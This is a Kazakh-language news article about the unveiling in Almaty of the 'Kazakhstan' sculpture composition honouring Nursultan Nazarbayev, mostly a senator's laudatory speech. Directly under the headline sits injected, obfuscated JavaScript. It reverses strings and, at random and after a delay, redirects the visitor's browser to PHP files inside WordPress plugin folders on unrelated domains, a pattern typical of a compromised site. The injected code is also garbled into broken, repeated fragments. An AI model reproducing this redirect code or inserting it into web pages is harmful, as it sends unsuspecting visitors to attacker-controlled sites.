Алматыда Елбасына ескерткіш қойылды
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/1-bet-pamya-tnik.jpg» height=»149″ width=»227″ />
Алматыдағы Қазақстан Республикасының Тұңғыш Президенті Нұрсұлтан Назарбаев атындағы саябақта «Қазақстан» монументтік-мүсіндік композициялық ескерткішінің ашылу салтанаты болды. Салтанатқа еліміздің көрнекті мемлекет және қоғам қайраткерлері, ғалымдар мен ақын-жазушылар, өнер иелері және қала тұрғындары қатысты.
Қуаныш СҰЛТАНОВ, сенатор, ҚР Парламенті Сенатының Халықаралық қатынастар, қорғаныс және қауіпсіздік комитетінің төрағасы: — Алматы — ең қасиетті құндылығымыз — тәуелсіздігімізді жариялап, ұлттың азаттық Туын көтерген тәуелсіздігіміздің алтын бесігі! Алматы — ұлттық рух, халықтық бірлігімізді тұтастырып, еңсемізді көтеріп, өркениет жорығын бастаған тәуелсіз мемлекеттің Тұңғыш Президентін сайлаған асыл Орда. Осы Алматыда біздің Президенттің бастамашылдығымен Тәуелсіз Мемлекеттер Достастығы, Азиядағы Сенім шаралары кеңесі, тағы басқа да халықаралық ұйымдар құрылды. Тұңғыш Президент туған елінің дүниежүзілік қоғамдастықта еңсесі биік ел болып танылуына күш салып, әлемнің назарын қазаққа аударып, ісін көрсетіп, сөзін тыңдатып, ақылын мойындатып, жаңа дәуір тұсында халқымыздың тұрмыс-әлеуетінің өсіп, өркендеуі үшін ең маңызды шешімдер қабылдап, оны жүзеге асырып, көркейгенін көрген жер. Қазақстанның 2030 жылға дейінгі даму стратегиясын Нұрсұлтан Әбішұлы осы Алматыда әзірлеп, жариялап, оны бүкіл қазақстандықтардың игілігіне, гүлденуіне жалғастырып, жасампаздыққа бастап, елді өз мүмкіндігіне, өз күшіне өзін сендіре алған іскер Орталық. Алматы — Нұрсұлтан Назарбаевтың «ғасыр жобасы» деген мәртебеге ие болған Қазақстанның Орталық өңірінің төсіне тәуелсіз мемлекетіміздің жаңа астанасын салу идеясын толғатып, жарыққа шығарып, халыққа жаратқан жасампаз қала. Мемлекет болу талпынысын жүзеге асыратын халық, сол халықты мемлекет мүддесіне ұйымдастырып, жұмылдыра алатын асқан қайраткерлік қабілеті бар жетекші Тұлға екендігіне осы жиырма жылда көзіміз айқын жетті. Қазақ халқы ежелден «сөз бастайтын шешенге, қол бастайтын көсемге» жол берген, сенім көрсеткен. Сындарлы кезеңде тарихтың шетінде қалып қоймай, өркениетті өсер елдің тіршілігін жасау үшін халқымыз ел тізгінін арманда кеткен талай ұрпақ, бабалардың мұрагері, ұлт перзенті — Нұрсұлтан Әбішұлы Назарбаевқа тапсырды, жорығын қолдап, соңынан ерді. Тұңғыш Президент те халқына берген Антын қалтқысыз орындап, аянбай тер төгумен келеді. Мемлекеттік тәуелсіздігімізді жария еткен алғашқы сәттен бастап, дербес мемлекетіміздің қуаттануы мен абаттануы сөз жоқ Тұңғыш Президентіміз, Елбасының есімімен, еңбегімен, басшылығымен тікелей байланысты. Президенттің қазақ халқы алдындағы, мемлекет алдындағы атқарған қызметі орасан, еңбегі ерен! Нұрсұлтан Әбішұлы Назарбаев жаңа дәуірдегі жаңа Қазақстан мемлекетінің негізін қалыптастырып, іргетасын қалап, қабырғасын тұрғызып, шаңырағын көтеріп, шекарасын бекітті. Қазақты әлемге танытты, мойындатты. Елімізде көпұлттың, көп діннің басын біріктіріп, татулық орнатып, қоғамдық келісімге келтіріп, тәуелсіз мемлекет мүддесіне жұмылдыра білді. Салиқалы сыртқы саясаты, салмақты бастамашыл қағидаттары арқылы дүниежүзілік қоғамдастықта Қазақстанның беделін мейлінше биікке көтерді. Әлемнің ең беделді жоғары дәрежедегі кездесу, жиындарында біздің Елбасының сөзі тың ойымен, орынды ұсыныстарымен ерекшеленеді. Осыдан 20 жыл бұрын Қазақстанның қайда екенін, қазақтың кім екенін білмейтін елдердің басшылары Елбасымен санасып, сөзіне құлақ асатын, құрметпен сыйлайтын болды. «Еріне қарап, елін таниды» деген халық нақылы осындайда айтылса керек. Түркия президенті Абдолла Гюль Қазақстан Президентін бүкіл Түрік әлемінің көшбасшысы деп бағалап, Анкара қаласының мэриясының шешімімен Түркия Астанасында өткен жылы қазақ Президентіне көрікті ескерткіш орнатып, салтанатты мереке өткізді. Біздің Елбасына мұндай құрмет басқа елдерде де көрсетілуде. Бүгін Алматы қаласында ашылатын монументтік-мүсіндік композицияны — тәуелсіз мемлекетіміздің символы, Нұрсұлтан Әбішұлының мемлекет, ұлт алдындағы қыруар еңбегіне, мемлекеттік қайраткерлігіне берілген әділ баға, тарихи таным деп қабылдағанымыз орынды! Сондай-ақ бұл кешен біздің сәулетшілеріміз бен мүсіншілеріміздің шебер шығармашылық туындысы.